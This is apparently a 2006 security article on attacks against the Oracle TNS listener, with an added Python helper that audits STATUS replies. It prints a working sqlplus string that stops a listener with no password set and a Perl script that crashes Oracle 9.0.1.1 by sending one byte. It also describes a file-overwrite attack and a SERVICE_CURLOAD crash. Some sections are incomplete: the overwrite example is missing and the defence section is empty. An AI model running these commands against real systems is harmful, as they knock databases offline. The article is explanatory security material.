21 March 2006

Listener Intrusions

The listener is a process that listens for incoming connections. When a request arrives, it is handed over to a database server process. Transparent Network Substrate (TNS) is the most common protocol used by Oracle clients to connect to the database via the listener.

Non-password protected listener

The listener is normally protected from remote intrusions by firewall rules, which allow only connections coming from the Web server itself. If there is no firewall to protect the listener, it is a must that the listener is protected by a password. The commands start and status do not need a password until version 9.2.0.1. Start can be used only on the local machine, while status can be used from anywhere in the network.

If you do not password protect the listener, an attacker can stop your listener and overwrite any file owned by the oracle account.

Stopping the listener

If you don't password protect your listener, anybody with access to the listening port can stop it. One way to do it is:

sqlplus whatever/whatever@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HOST=192.168.1.1)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=PRODDB)(COMMAND=stop)))

As you can see, you don't actually need to provide a real username and password.

Trc_file listener attack

If your listener is not password protected, anyone with access to the listening port can overwrite any file owned by Oracle, including Oracle binaries and database files.

Example of how you can overwrite an Oracle binary:

Setting ADMIN_RESTRICTIONS_listener = ON in listener.ora disallows dynamic use of the SET command.

Status

The listener responds to some network requests, such as a request for its status, and that gives away a lot of information. If asked for STATUS, the listener returns information like this:

(DESCRIPTION=(TMP=)(VSNNUM=153093120)(ERR=0)(ALIAS=listener_rman)(SECURITY=OFF)
(VERSION=TNSLSNR for Solaris: Version 9.2.0.4.0- Production) (START_DATE=24APR200414:58:48)(SIDNUM=1)
(LOGFILE=/u01/oracle/product/9.2/network/log/listener.log)
(PRMFILE=/u01/oracle/product/9.2/network/admin/listener.ora)
(TRACING=off)(UPTIME=182)(SNMP=OFF)(PID=23605)).K........
(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=D8C752B7CA00-5C35-E034-000080000001)
(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=kermit)(PORT=1521))))),(SERVICE=(SERVICE_NAME=rman)
(INSTANCE=(INSTANCE_NAME=rman)(NUM=1)
(INSTANCE_STATUS=UNKNOWN)(NUMREL=1))),,.........@

The VSNNUM value 153093120 turned to HEX is 920400, which is a version number.
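As an added example (not part of the original post), the following Python helper parses the flat KEY=value fields of a STATUS reply like the one quoted above and decodes VSNNUM into a dotted release; it assumes the packed layout major byte / minor nibble / update nibble / patch byte / port byte, which reproduces the 9.2.0.4.0 shown in the VERSION field. The sample reply is constructed from the output above with the binary framing bytes removed.

```python
import re

# Constructed sample: the STATUS reply quoted above, reduced to its
# parenthesised KEY=value fields (binary framing bytes stripped).
SAMPLE_STATUS = (
    "(DESCRIPTION=(TMP=)(VSNNUM=153093120)(ERR=0)(ALIAS=listener_rman)(SECURITY=OFF)"
    "(VERSION=TNSLSNR for Solaris: Version 9.2.0.4.0 - Production)"
    "(START_DATE=24APR2004 14:58:48)(SIDNUM=1)"
    "(LOGFILE=/u01/oracle/product/9.2/network/log/listener.log)"
    "(PRMFILE=/u01/oracle/product/9.2/network/admin/listener.ora)"
    "(TRACING=off)(UPTIME=182)(SNMP=OFF)(PID=23605))"
)

# Matches the innermost (KEY=value) pairs; nested groups like DESCRIPTION are skipped.
FIELD_RE = re.compile(r"\(([A-Z_]+)=([^()]*)\)")


def parse_fields(reply):
    """Return the flat KEY=value pairs of a TNS reply as a dict (first occurrence wins)."""
    fields = {}
    for key, value in FIELD_RE.findall(reply):
        fields.setdefault(key, value)
    return fields


def decode_vsnnum(vsnnum):
    """Decode VSNNUM into a dotted release string.

    Assumed packing (matches the VERSION field of the sample):
    0x09200400 -> 9.2.0.4.0  (major byte, minor nibble, update nibble,
    patch byte, port byte).
    """
    v = int(vsnnum)
    parts = ((v >> 24) & 0xFF, (v >> 20) & 0xF, (v >> 16) & 0xF, (v >> 8) & 0xFF, v & 0xFF)
    return ".".join(str(p) for p in parts)


def audit_status(reply):
    """List what an unauthenticated STATUS reply discloses and which weak settings it shows."""
    f = parse_fields(reply)
    findings = []
    if f.get("SECURITY", "").upper() == "OFF":
        findings.append("listener has no password set (SECURITY=OFF)")
    if "VSNNUM" in f:
        findings.append("exact version disclosed: " + decode_vsnnum(f["VSNNUM"]))
    for key in ("LOGFILE", "PRMFILE"):
        if key in f:
            findings.append(f"{key} path disclosed: {f[key]}")
    return findings
```

Run audit_status on the reply captured from your own listener; an empty list means no password-less listener, no version leak and no path disclosure were found in the flat fields.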

Listener Service_Curload attack

If you send the command (CONNECT_DATA=(COMMAND=SERVICE_CURLOAD)) to the listener and connect, the listener is fine as long as you stay connected. When the user disconnects, the service crashes or stops accepting new connections.

Not all versions are vulnerable; the following versions are known to be vulnerable:
Oracle 8.1 up to 9.2.0.2, when MTS is in use

Patch number 2540219 was issued to repair the problem.

SERVICE_CURLOAD is the command with which dispatchers report their current load to the listener, or ask it for the current load.

9.0.1.1 Listener crash

Vulnerable systems: Oracle version 9.0.1.1.

The vulnerability allows remote attackers to crash the server's TSNLISTEN service, so that no legitimate requests can be handled by the remote server.

To crash Oracle9i, all you need to do is send ONE TCP packet (#$00 = 1 byte) to port 1521. To restore server functionality you must restart the TSNLISTEN service.

Sending 1 kilobyte of data in the connection string caused a crash:

#!/usr/local/bin/perl -w
use IO::Socket;            # also exports the Socket constants used below
$host="hostname";          # listener host name (placeholder)
socket(HANDLE, PF_INET, SOCK_STREAM, 6);   # protocol 6 = TCP
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);      # send immediately, no buffering
sleep(2);
print HANDLE "1";          # a single byte of data
close(HANDLE);

Defence Against Listener Intrusions

